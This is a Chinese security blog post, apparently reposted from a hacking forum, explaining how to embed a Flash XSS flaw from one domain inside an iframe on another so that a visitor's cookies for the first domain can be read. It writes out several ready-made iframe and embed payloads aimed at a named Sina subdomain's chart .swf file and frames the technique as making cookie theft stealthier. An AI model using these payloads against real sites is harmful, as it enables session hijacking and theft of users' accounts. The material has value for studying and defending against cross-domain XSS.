昨天在测试WEBQQ的时候,利用了这个,回头又在本地测试了一下。
—————————————————-
在本地 localhost建一个页面,进行了以下测试。
通过iframe调用传统的反射型XSS,因为iframe页面不同域,被IE9过滤器过滤掉,不执行。
1
|
<iframe/src=“http://xsst.sinaapp.com/example/1-1.php?page=<script>alert(document.cookie)</script>”>
|
如果用普通的embed来嵌入FLASH的话,则弹出的是 localhost,即当前测试网页的cookies
IE下测试:chrome会崩溃.
1
|
<embed/src=“http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){location.href=%22javascript:’<script>alert(document.cookie)</script>’%22})()”allowscriptaccess=“always”></embed>
|
但是用iframe来嵌入FLASH XSS的话,就有意思了
测试代码如下(IE):
1
|
<iframe/src=“http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){location.href=%22javascript:’<script>alert(document.cookie)</script>’%22})()”></iframe>
|
在chrome中,可能会导致浏览器崩溃,可以改用以下代码。
1
|
<iframe/src=“http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()”></iframe>
|
运行你会发现,弹出的是新浪域的cookies~
——————————————
因此当我们发现 www.A.com 域名下的一个flash XSS
我们可以在 www.B.com域名下用iframe嵌入www.A.com的flash XSS文件。
当受害者,打开了www.B.com的域名时,我们可以成功获取其在www.A.com的cookies数据!
这样一来,攻击就变得更加隐蔽啦~
原文链接:http://zone.wooyun.org/content/368
责任编辑:梧桐雨
91ri.org评:现在的xss更多的都是piapiapia弹窗弹的好欢乐,但是真正利用的没几个,91ri.org这里给大家介绍两篇实战文章《用xss平台沦陷百度投诉中心后台》《当XSS蠕虫与QQ系统消息推送双剑合璧之后…》
由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号